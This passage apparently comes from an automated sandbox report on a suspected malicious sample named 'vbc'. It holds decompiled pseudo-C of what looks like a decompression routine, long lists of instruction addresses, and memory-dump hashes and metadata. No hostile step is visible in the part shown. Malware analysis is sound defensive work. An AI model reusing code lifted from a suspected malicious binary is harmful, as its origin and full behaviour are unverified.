                                                													if(__edx + __ecx > __eax) {
                                                														goto L9;
                                                													}
                                                													L86:
                                                													__eflags =  *(__ebp - 0x14) - 0x10;
                                                													if( *(__ebp - 0x14) != 0x10) {
                                                														L89:
                                                														__edi = 0;
                                                														__eflags = 0;
                                                														L90:
                                                														__eax = __esi + 0xc + __ecx * 4;
                                                														do {
                                                															L91:
                                                															 *__eax = __edi;
                                                															__ecx = __ecx + 1;
                                                															__eax = __eax + 4;
                                                															__edx = __edx - 1;
                                                															__eflags = __edx;
                                                														} while (__edx != 0);
                                                														__esi[2] = __ecx;
                                                														continue;
                                                													}
                                                													L87:
                                                													__eflags = __ecx - 1;
                                                													if(__ecx < 1) {
                                                														goto L9;
                                                													}
                                                													L88:
                                                													__edi =  *(__esi + 8 + __ecx * 4);
                                                													goto L90;
                                                												}
                                                												L78:
                                                												__ecx = __edx;
                                                												__ebx = __ebx - __edx;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                												__ecx = __esi[2];
                                                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                												__esi[2] = __esi[2] + 1;
                                                											}
                                                											L94:
                                                											__eax = __esi[1];
                                                											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                											__edi = __eax;
                                                											__eax = __eax >> 5;
                                                											__edi = __edi & 0x0000001f;
                                                											__ecx = 0x101;
                                                											__eax = __eax & 0x0000001f;
                                                											__edi = __edi + 0x101;
                                                											__eax = __eax + 1;
                                                											__edx = __ebp - 0xc;
                                                											 *(__ebp - 0x14) = __eax;
                                                											 &(__esi[0x148]) = __ebp - 4;
                                                											 *(__ebp - 4) = 9;
                                                											__ebp - 0x18 =  &(__esi[3]);
                                                											 *(__ebp - 0x10) = 6;
                                                											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                											__eflags =  *(__ebp - 4);
                                                											if( *(__ebp - 4) == 0) {
                                                												__eax = __eax | 0xffffffff;
                                                												__eflags = __eax;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L9;
                                                											} else {
                                                												L97:
                                                												__ebp - 0xc =  &(__esi[0x148]);
                                                												__ebp - 0x10 = __ebp - 0x1c;
                                                												__eax = __esi + 0xc + __edi * 4;
                                                												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                												__eflags = __eax;
                                                												if(__eax != 0) {
                                                													goto L9;
                                                												}
                                                												L98:
                                                												__eax =  *(__ebp - 0x10);
                                                												__eflags =  *(__ebp - 0x10);
                                                												if( *(__ebp - 0x10) != 0) {
                                                													L100:
                                                													__cl =  *(__ebp - 4);
                                                													 *__esi =  *__esi & 0x00000000;
                                                													__eflags =  *__esi;
                                                													__esi[4] = __al;
                                                													__eax =  *(__ebp - 0x18);
                                                													__esi[5] =  *(__ebp - 0x18);
                                                													__eax =  *(__ebp - 0x1c);
                                                													__esi[4] = __cl;
                                                													__esi[6] =  *(__ebp - 0x1c);
                                                													goto L101;
                                                												}
                                                												L99:
                                                												__eflags = __edi - 0x101;
                                                												if(__edi > 0x101) {
                                                													goto L9;
                                                												}
                                                												goto L100;
                                                											}
                                                										case 0xe:
                                                											goto L9;
                                                										case 0xf:
                                                											L175:
                                                											__eax =  *(__ebp - 0x30);
                                                											__esi[0x26ea] =  *(__ebp - 0x30);
                                                											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                											__ecx = __esi[0x26ea];
                                                											__edx = __esi[0x26e9];
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x30) = __ecx;
                                                											if(__ecx >= __edx) {
                                                												__eax = __esi[0x26e8];
                                                												__eax = __esi[0x26e8] - __ecx;
                                                												__eflags = __eax;
                                                											} else {
                                                												__edx = __edx - __ecx;
                                                												__eax = __edx - __ecx - 1;
                                                											}
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ecx != __edx) {
                                                												L183:
                                                												__edi = 0;
                                                												goto L10;
                                                											} else {
                                                												L179:
                                                												__eax = __esi[0x145];
                                                												__eflags = __eax - 8;
                                                												 *__esi = __eax;
                                                												if(__eax != 8) {
                                                													L184:
                                                													0 = 1;
                                                													goto L10;
                                                												}
                                                												goto L180;
                                                											}
                                                									}
                                                								}
                                                								L181:
                                                								goto L9;
                                                							}
                                                							L70:
                                                							if( *__edi == __eax) {
                                                								goto L72;
                                                							}
                                                							L71:
                                                							__esi[2] = __esi[2] & __eax;
                                                							 *__esi = 0xd;
                                                							goto L93;
                                                						}
                                                					}
                                                				}
                                                				L182:
                                                				_t443 = 0;
                                                				_t446[0x147] =  *(_t448 - 0x40);
                                                				_t446[0x146] = _t425;
                                                				( *(_t448 + 8))[1] = 0;
                                                				goto L11;
                                                			}









                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d89
                                                0x00000000
                                                0x00000000
                                                0x00406d8f
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9a
                                                0x00406d9c
                                                0x00406d9f
                                                0x00406da2
                                                0x00406da5
                                                0x00406da5
                                                0x00406da8
                                                0x00000000
                                                0x00000000
                                                0x00406daa
                                                0x00406daa
                                                0x00406dad
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dbd
                                                0x00406b1c
                                                0x00406b1c
                                                0x00406b1f
                                                0x00406b25
                                                0x00406b2b
                                                0x00406b34
                                                0x00406b3a
                                                0x00406b3d
                                                0x00406b44
                                                0x00406b49
                                                0x00406b4f
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406dc3
                                                0x00406dc3
                                                0x00406dcd
                                                0x00000000
                                                0x00000000
                                                0x00406dd3
                                                0x00406dd3
                                                0x00406dd7
                                                0x00406dda
                                                0x00406dda
                                                0x00406dde
                                                0x00406de4
                                                0x00406de4
                                                0x00406de7
                                                0x00406dea
                                                0x00406df0
                                                0x00000000
                                                0x00000000
                                                0x00406df2
                                                0x00406e14
                                                0x00406e14
                                                0x00406e17
                                                0x00000000
                                                0x00000000
                                                0x00406df4
                                                0x00406df8
                                                0x00000000
                                                0x00000000
                                                0x00406dfe
                                                0x00406dfe
                                                0x00406e01
                                                0x00406e04
                                                0x00406e09
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e11
                                                0x00406e19
                                                0x00406e19
                                                0x00406e1f
                                                0x00406e22
                                                0x00406e25
                                                0x00406e25
                                                0x00406e2c
                                                0x00406e30
                                                0x00406e34
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e40
                                                0x00406e45
                                                0x00000000
                                                0x00000000
                                                0x00406e47
                                                0x00406e5b
                                                0x00406e5b
                                                0x00406e5f
                                                0x00000000
                                                0x00000000
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e53
                                                0x00406e58
                                                0x00406e58
                                                0x00406e58
                                                0x00406e61
                                                0x00406e61
                                                0x00406e64
                                                0x00406e72
                                                0x00406e78
                                                0x00406e7d
                                                0x00406e83
                                                0x00406e89
                                                0x00406e8f
                                                0x00406e96
                                                0x00406eaa
                                                0x00406eaa
                                                0x00407479
                                                0x00407479
                                                0x00407479
                                                0x0040747e
                                                0x00000000
                                                0x00000000
                                                0x00406ab6
                                                0x00406ab6
                                                0x00000000
                                                0x004070b1
                                                0x004070b1
                                                0x004070b5
                                                0x004070b8
                                                0x004070bb
                                                0x004070be
                                                0x00000000
                                                0x00000000
                                                0x004070c4
                                                0x004070c4
                                                0x004070e9
                                                0x004070e9
                                                0x004070e9
                                                0x004070eb
                                                0x00000000
                                                0x00000000
                                                0x004070c9
                                                0x004070c9
                                                0x004070cd
                                                0x00000000
                                                0x00000000
                                                0x004070d3
                                                0x004070d3
                                                0x004070d6
                                                0x004070d9
                                                0x004070dc
                                                0x004070de
                                                0x004070e0
                                                0x004070e3
                                                0x004070e6
                                                0x004070e6
                                                0x004070e6
                                                0x004070ed
                                                0x004070ed
                                                0x004070f5
                                                0x004070f8
                                                0x004070fb
                                                0x004070fe
                                                0x00407102
                                                0x00407105
                                                0x00407107
                                                0x0040710a
                                                0x0040710c
                                                0x00407120
                                                0x00407120
                                                0x00407123
                                                0x0040713d
                                                0x0040713d
                                                0x00407140
                                                0x00000000
                                                0x00000000
                                                0x00407146
                                                0x00407146
                                                0x00407149
                                                0x00000000
                                                0x00000000
                                                0x0040714f
                                                0x0040714f
                                                0x00000000
                                                0x0040714f
                                                0x00407125
                                                0x00407128
                                                0x0040712f
                                                0x00407132
                                                0x00000000
                                                0x00407132
                                                0x0040710e
                                                0x00407112
                                                0x00407115
                                                0x00000000
                                                0x00000000
                                                0x0040715a
                                                0x0040715a
                                                0x0040717f
                                                0x0040717f
                                                0x0040717f
                                                0x00407181
                                                0x00000000
                                                0x00000000
                                                0x0040715f
                                                0x0040715f
                                                0x00407163
                                                0x00000000
                                                0x00000000
                                                0x00407169
                                                0x00407169
                                                0x0040716c
                                                0x0040716f
                                                0x00407172
                                                0x00407174
                                                0x00407176
                                                0x00407179
                                                0x0040717c
                                                0x0040717c
                                                0x0040717c
                                                0x00407183
                                                0x0040718b
                                                0x0040718e
                                                0x00407191
                                                0x00407193
                                                0x00407196
                                                0x00407196
                                                0x00407198
                                                0x0040719c
                                                0x0040719f
                                                0x004071a2
                                                0x004071a5
                                                0x00000000
                                                0x00000000
                                                0x004071ab
                                                0x004071ab
                                                0x004071d0
                                                0x004071d0
                                                0x004071d0
                                                0x004071d2
                                                0x00000000
                                                0x00000000
                                                0x004071b0
                                                0x004071b0
                                                0x004071b4
                                                0x00000000
                                                0x00000000
                                                0x004071ba
                                                0x004071ba
                                                0x004071bd
                                                0x004071c0
                                                0x004071c3
                                                0x004071c5
                                                0x004071c7
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071cd
                                                0x004071d4
                                                0x004071d4
                                                0x004071dc
                                                0x004071df
                                                0x004071e2
                                                0x004071e5
                                                0x004071e9
                                                0x004071ec
                                                0x004071ee
                                                0x004071f1
                                                0x004071f4
                                                0x0040720e
                                                0x0040720e
                                                0x00407211
                                                0x00000000
                                                0x00000000
                                                0x00407217
                                                0x00407217
                                                0x0040721a
                                                0x00407221
                                                0x00000000
                                                0x00407221
                                                0x004071f6
                                                0x004071f9
                                                0x00407200
                                                0x00407203
                                                0x00000000
                                                0x00000000
                                                0x00407229
                                                0x00407229
                                                0x0040724e
                                                0x0040724e
                                                0x0040724e
                                                0x00407250
                                                0x00000000
                                                0x00000000
                                                0x0040722e
                                                0x0040722e
                                                0x00407232
                                                0x00000000
                                                0x00000000
                                                0x00407238
                                                0x00407238
                                                0x0040723b
                                                0x0040723e
                                                0x00407241
                                                0x00407243
                                                0x00407245
                                                0x00407248
                                                0x0040724b
                                                0x0040724b
                                                0x0040724b
                                                0x00407252
                                                0x0040725a
                                                0x0040725d
                                                0x00407260
                                                0x00407262
                                                0x00407265
                                                0x00407265
                                                0x00407267
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407270
                                                0x00407275
                                                0x00407277
                                                0x0040727d
                                                0x0040727f
                                                0x00407294
                                                0x00407296
                                                0x00407296
                                                0x00407281
                                                0x00407287
                                                0x00407289
                                                0x0040728b
                                                0x0040728b
                                                0x00407298
                                                0x0040729c
                                                0x0040729f
                                                0x004072a5
                                                0x004072a5
                                                0x004072a8
                                                0x004072a8
                                                0x004072a8
                                                0x004072aa
                                                0x00000000
                                                0x00000000
                                                0x004072b0
                                                0x004072b0
                                                0x004072b6
                                                0x004072b8
                                                0x004072dd
                                                0x004072e0
                                                0x004072e6
                                                0x004072eb
                                                0x004072f1
                                                0x004072f7
                                                0x004072f9
                                                0x004072fc
                                                0x00407305
                                                0x0040730b
                                                0x0040730b
                                                0x004072fe
                                                0x00407300
                                                0x00407302
                                                0x00407302
                                                0x0040730d
                                                0x00407313
                                                0x00407315
                                                0x00407318
                                                0x0040731a
                                                0x00407320
                                                0x00407322
                                                0x00407324
                                                0x00407326
                                                0x00407328
                                                0x0040732b
                                                0x00407334
                                                0x00407337
                                                0x00407337
                                                0x0040732d
                                                0x0040732d
                                                0x00407330
                                                0x00407330
                                                0x0040732b
                                                0x00407322
                                                0x00407339
                                                0x0040733b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040733b
                                                0x004072ba
                                                0x004072ba
                                                0x004072c0
                                                0x004072c6
                                                0x004072c8
                                                0x00000000
                                                0x00000000
                                                0x004072ca
                                                0x004072ca
                                                0x004072cc
                                                0x004072ce
                                                0x004072d7
                                                0x004072d7
                                                0x004072d0
                                                0x004072d0
                                                0x004072d3
                                                0x004072d3
                                                0x004072d9
                                                0x004072db
                                                0x00000000
                                                0x00000000
                                                0x00407341
                                                0x00407341
                                                0x00407346
                                                0x00407348
                                                0x00407349
                                                0x0040734a
                                                0x0040734b
                                                0x00407351
                                                0x00407354
                                                0x00407357
                                                0x0040735a
                                                0x0040735c
                                                0x00407362
                                                0x00407362
                                                0x00407365
                                                0x00407365
                                                0x00407365
                                                0x00407365
                                                0x0040736e
                                                0x00000000
                                                0x00000000
                                                0x00407373
                                                0x00407373
                                                0x00407376
                                                0x00407379
                                                0x0040737b
                                                0x00407412
                                                0x00407412
                                                0x00407415
                                                0x00407417
                                                0x00407418
                                                0x00407419
                                                0x0040741c
                                                0x00000000
                                                0x0040741c
                                                0x00407381
                                                0x00407381
                                                0x00407387
                                                0x00407389
                                                0x004073ae
                                                0x004073b1
                                                0x004073b7
                                                0x004073bc
                                                0x004073c2
                                                0x004073c8
                                                0x004073ca
                                                0x004073cd
                                                0x004073d6
                                                0x004073dc
                                                0x004073dc
                                                0x004073cf
                                                0x004073d1
                                                0x004073d3
                                                0x004073d3
                                                0x004073de
                                                0x004073e4
                                                0x004073e6
                                                0x004073e9
                                                0x004073eb
                                                0x004073f1
                                                0x004073f3
                                                0x004073f5
                                                0x004073f7
                                                0x004073f9
                                                0x004073fc
                                                0x00407405
                                                0x00407408
                                                0x00407408
                                                0x004073fe
                                                0x004073fe
                                                0x00407401
                                                0x00407401
                                                0x004073fc
                                                0x004073f3
                                                0x0040740a
                                                0x0040740c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040740c
                                                0x0040738b
                                                0x0040738b
                                                0x00407391
                                                0x00407397
                                                0x00407399
                                                0x00000000
                                                0x00000000
                                                0x0040739b
                                                0x0040739b
                                                0x0040739d
                                                0x0040739f
                                                0x004073a6
                                                0x004073a6
                                                0x004073a8
                                                0x004073a1
                                                0x004073a1
                                                0x004073a3
                                                0x004073a3
                                                0x004073aa
                                                0x004073ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407424
                                                0x00407424
                                                0x00407427
                                                0x00407429
                                                0x0040742c
                                                0x0040742f
                                                0x0040742f
                                                0x0040742f
                                                0x0040742f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406add
                                                0x00406ac1
                                                0x00000000
                                                0x00406ac7
                                                0x00406aca
                                                0x00406ad4
                                                0x00406ad7
                                                0x00406ada
                                                0x00000000
                                                0x00406ada
                                                0x00406ac1
                                                0x00406ae5
                                                0x00406ae8
                                                0x00406aec
                                                0x00406af6
                                                0x00406b00
                                                0x00406b03
                                                0x00406b09
                                                0x00406c3d
                                                0x00406c3f
                                                0x00406c45
                                                0x00406c48
                                                0x00406c4b
                                                0x00000000
                                                0x00406c4b
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b10
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6f
                                                0x00406c15
                                                0x00406c15
                                                0x00406c1a
                                                0x00406c1d
                                                0x00406c22
                                                0x00406c25
                                                0x00406c2a
                                                0x00406c2d
                                                0x00406c32
                                                0x00406c35
                                                0x00406c35
                                                0x00000000
                                                0x00406b75
                                                0x00406b75
                                                0x00406b75
                                                0x00406b75
                                                0x00406b79
                                                0x00406b79
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba0
                                                0x00406ba3
                                                0x00406ba8
                                                0x00406b7e
                                                0x00406b7e
                                                0x00406b83
                                                0x00406b85
                                                0x00406b87
                                                0x00406b8c
                                                0x00406b92
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406b8e
                                                0x00406b8e
                                                0x00406b8e
                                                0x00406b8c
                                                0x00000000
                                                0x00406baa
                                                0x00406bd7
                                                0x00406bdc
                                                0x00406bde
                                                0x00406bdf
                                                0x00406be1
                                                0x00406be2
                                                0x00406be2
                                                0x00406be2
                                                0x00406c0a
                                                0x00406c0f
                                                0x00406c0f
                                                0x00000000
                                                0x00406c0f
                                                0x00406ba8
                                                0x00406b6f
                                                0x00406b12
                                                0x00406b12
                                                0x00406b13
                                                0x00406b5d
                                                0x00000000
                                                0x00406b5d
                                                0x00406b15
                                                0x00406b16
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c72
                                                0x00406c72
                                                0x00406c72
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c52
                                                0x00406c52
                                                0x00406c56
                                                0x00000000
                                                0x00000000
                                                0x00406c5c
                                                0x00406c5c
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c67
                                                0x00406c69
                                                0x00406c6c
                                                0x00406c6f
                                                0x00406c6f
                                                0x00406c6f
                                                0x00406c77
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7c
                                                0x00406c81
                                                0x00406c84
                                                0x00406c86
                                                0x00406c89
                                                0x00000000
                                                0x00000000
                                                0x00406c8f
                                                0x00406c8f
                                                0x00406c91
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00000000
                                                0x00000000
                                                0x00406ca1
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca6
                                                0x00406d44
                                                0x00406d44
                                                0x00406d47
                                                0x00406d49
                                                0x00406d49
                                                0x00406d4c
                                                0x00406d4f
                                                0x00406d51
                                                0x00406d53
                                                0x00406d55
                                                0x00406d55
                                                0x00406d5e
                                                0x00406d63
                                                0x00406d66
                                                0x00406d69
                                                0x00406d6c
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d78
                                                0x00406d78
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d7e
                                                0x00000000
                                                0x00406d72
                                                0x00406cac
                                                0x00406cac
                                                0x00406cb2
                                                0x00406cb5
                                                0x00406cb7
                                                0x00406ce2
                                                0x00406ce5
                                                0x00406ceb
                                                0x00406cf0
                                                0x00406cf6
                                                0x00406cfc
                                                0x00406cfe
                                                0x00406d01
                                                0x00406d0a
                                                0x00406d10
                                                0x00406d10
                                                0x00406d03
                                                0x00406d05
                                                0x00406d07
                                                0x00406d07
                                                0x00406d12
                                                0x00406d18
                                                0x00406d1b
                                                0x00406d1d
                                                0x00406d1f
                                                0x00406d25
                                                0x00406d27
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d35
                                                0x00406d35
                                                0x00406d37
                                                0x00406d2e
                                                0x00406d2e
                                                0x00406d31
                                                0x00406d31
                                                0x00406d39
                                                0x00406d39
                                                0x00406d27
                                                0x00406d3c
                                                0x00406d3e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406d3e
                                                0x00406cb9
                                                0x00406cb9
                                                0x00406cbf
                                                0x00406cc5
                                                0x00406cc7
                                                0x00000000
                                                0x00000000
                                                0x00406cc9
                                                0x00406cc9
                                                0x00406ccb
                                                0x00406ccd
                                                0x00406cd0
                                                0x00406cd7
                                                0x00406cd7
                                                0x00406cd9
                                                0x00406cd2
                                                0x00406cd2
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cdb
                                                0x00406cdd
                                                0x00406ce0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406de4
                                                0x00406de7
                                                0x00406dea
                                                0x00406df0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fc7
                                                0x00406fc7
                                                0x00406fc7
                                                0x00406fca
                                                0x00406fcd
                                                0x00406fcf
                                                0x00406fd2
                                                0x00406fd8
                                                0x00406fdf
                                                0x00406fe1
                                                0x00000000
                                                0x00000000
                                                0x00406eb5
                                                0x00406eb5
                                                0x00406edd
                                                0x00406edd
                                                0x00406edd
                                                0x00406edf
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ebd
                                                0x00406ec1
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406eca
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed2
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406eda
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee1
                                                0x00406ee9
                                                0x00406eec
                                                0x00406ef2
                                                0x00406ef5
                                                0x00406ef9
                                                0x00406efd
                                                0x00406f00
                                                0x00406f03
                                                0x00406f1b
                                                0x00406f1b
                                                0x00406f1e
                                                0x00406f2c
                                                0x00406f2f
                                                0x00406f20
                                                0x00406f20
                                                0x00406f22
                                                0x00406f29
                                                0x00406f29
                                                0x00406f58
                                                0x00406f58
                                                0x00406f58
                                                0x00406f5b
                                                0x00406f5d
                                                0x00000000
                                                0x00000000
                                                0x00406f38
                                                0x00406f38
                                                0x00406f3c
                                                0x00000000
                                                0x00000000
                                                0x00406f42
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4d
                                                0x00406f4f
                                                0x00406f52
                                                0x00406f55
                                                0x00406f55
                                                0x00406f55
                                                0x00406f5f
                                                0x00406f5f
                                                0x00406f61
                                                0x00406f63
                                                0x00406f6e
                                                0x00406f71
                                                0x00406f74
                                                0x00406f76
                                                0x00406f78
                                                0x00406f7a
                                                0x00406f7d
                                                0x00406f80
                                                0x00406f85
                                                0x00406f88
                                                0x00406f8b
                                                0x00406f8e
                                                0x00406f95
                                                0x00406f98
                                                0x00406f9a
                                                0x00000000
                                                0x00000000
                                                0x00406fa0
                                                0x00406fa0
                                                0x00406fa4
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb7
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbd
                                                0x00406fbe
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc4
                                                0x00000000
                                                0x00406fc4
                                                0x00406fa6
                                                0x00406fa6
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x00406faf
                                                0x00406faf
                                                0x00000000
                                                0x00406faf
                                                0x00406f05
                                                0x00406f05
                                                0x00406f07
                                                0x00406f09
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f13
                                                0x00406f13
                                                0x00406fe7
                                                0x00406fe7
                                                0x00406fea
                                                0x00406ff1
                                                0x00406ff5
                                                0x00406ff7
                                                0x00406ffa
                                                0x00406ffd
                                                0x00407002
                                                0x00407005
                                                0x00407007
                                                0x00407008
                                                0x0040700b
                                                0x00407016
                                                0x00407019
                                                0x00407030
                                                0x00407035
                                                0x0040703c
                                                0x00407041
                                                0x00407045
                                                0x00407047
                                                0x00407047
                                                0x00407047
                                                0x0040704a
                                                0x0040704c
                                                0x00000000
                                                0x00407052
                                                0x00407052
                                                0x00407056
                                                0x00407061
                                                0x00407074
                                                0x00407079
                                                0x0040707e
                                                0x00407080
                                                0x00000000
                                                0x00000000
                                                0x00407086
                                                0x00407086
                                                0x00407089
                                                0x0040708b
                                                0x00407099
                                                0x00407099
                                                0x0040709c
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x00000000
                                                0x004070ae
                                                0x0040708d
                                                0x0040708d
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407432
                                                0x00407432
                                                0x00407438
                                                0x0040743e
                                                0x00407443
                                                0x00407449
                                                0x0040744f
                                                0x00407451
                                                0x00407454
                                                0x0040745d
                                                0x00407463
                                                0x00407463
                                                0x00407456
                                                0x00407458
                                                0x0040745a
                                                0x0040745a
                                                0x00407465
                                                0x00407467
                                                0x0040746a
                                                0x004074a5
                                                0x004074a5
                                                0x00000000
                                                0x0040746c
                                                0x0040746c
                                                0x0040746c
                                                0x00407472
                                                0x00407475
                                                0x00407477
                                                0x004074ac
                                                0x004074ae
                                                0x00000000
                                                0x004074ae
                                                0x00000000
                                                0x00407477
                                                0x00000000
                                                0x00406ab6
                                                0x00407484
                                                0x00000000
                                                0x00407484
                                                0x00406e98
                                                0x00406e9a
                                                0x00000000
                                                0x00000000
                                                0x00406e9c
                                                0x00406e9c
                                                0x00406e9f
                                                0x00000000
                                                0x00406e9f
                                                0x00406de4
                                                0x00406da5
                                                0x00407489
                                                0x0040748c
                                                0x0040748e
                                                0x00407497
                                                0x0040749d
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                				signed int _v8;
                                                				unsigned int _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				intOrPtr* _v32;
                                                				signed int* _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				void _v116;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				signed int _v240;
                                                				signed int _t166;
                                                				signed int _t168;
                                                				intOrPtr _t175;
                                                				signed int _t181;
                                                				void* _t182;
                                                				intOrPtr _t183;
                                                				signed int* _t184;
                                                				signed int _t186;
                                                				signed int _t187;
                                                				signed int* _t189;
                                                				signed int _t190;
                                                				intOrPtr* _t191;
                                                				intOrPtr _t192;
                                                				signed int _t193;
                                                				signed int _t195;
                                                				signed int _t200;
                                                				signed int _t205;
                                                				void* _t207;
                                                				short _t208;
                                                				signed char _t222;
                                                				signed int _t224;
                                                				signed int _t225;
                                                				signed int* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				void* _t235;
                                                				signed int _t236;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t251;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t259;
                                                				signed int _t262;
                                                				void* _t263;
                                                				void* _t264;
                                                				signed int _t267;
                                                				intOrPtr _t269;
                                                				intOrPtr _t271;
                                                				signed int _t274;
                                                				intOrPtr* _t275;
                                                				unsigned int _t276;
                                                				void* _t277;
                                                				signed int _t278;
                                                				intOrPtr* _t279;
                                                				signed int _t281;
                                                				intOrPtr _t282;
                                                				intOrPtr _t283;
                                                				signed int* _t284;
                                                				signed int _t286;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t296;
                                                				signed int* _t297;
                                                				intOrPtr _t298;
                                                				void* _t299;
                                                
                                                				_t278 = _a8;
                                                				_t187 = 0x10;
                                                				memset( &_v116, 0, _t187 << 2);
                                                				_t189 = _a4;
                                                				_t233 = _t278;
                                                				do {
                                                					_t166 =  *_t189;
                                                					_t189 =  &(_t189[1]);
                                                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                					_t233 = _t233 - 1;
                                                				} while (_t233 != 0);
                                                				if(_v116 != _t278) {
                                                					_t279 = _a28;
                                                					_t267 =  *_t279;
                                                					_t190 = 1;
                                                					_a28 = _t267;
                                                					_t234 = 0xf;
                                                					while(1) {
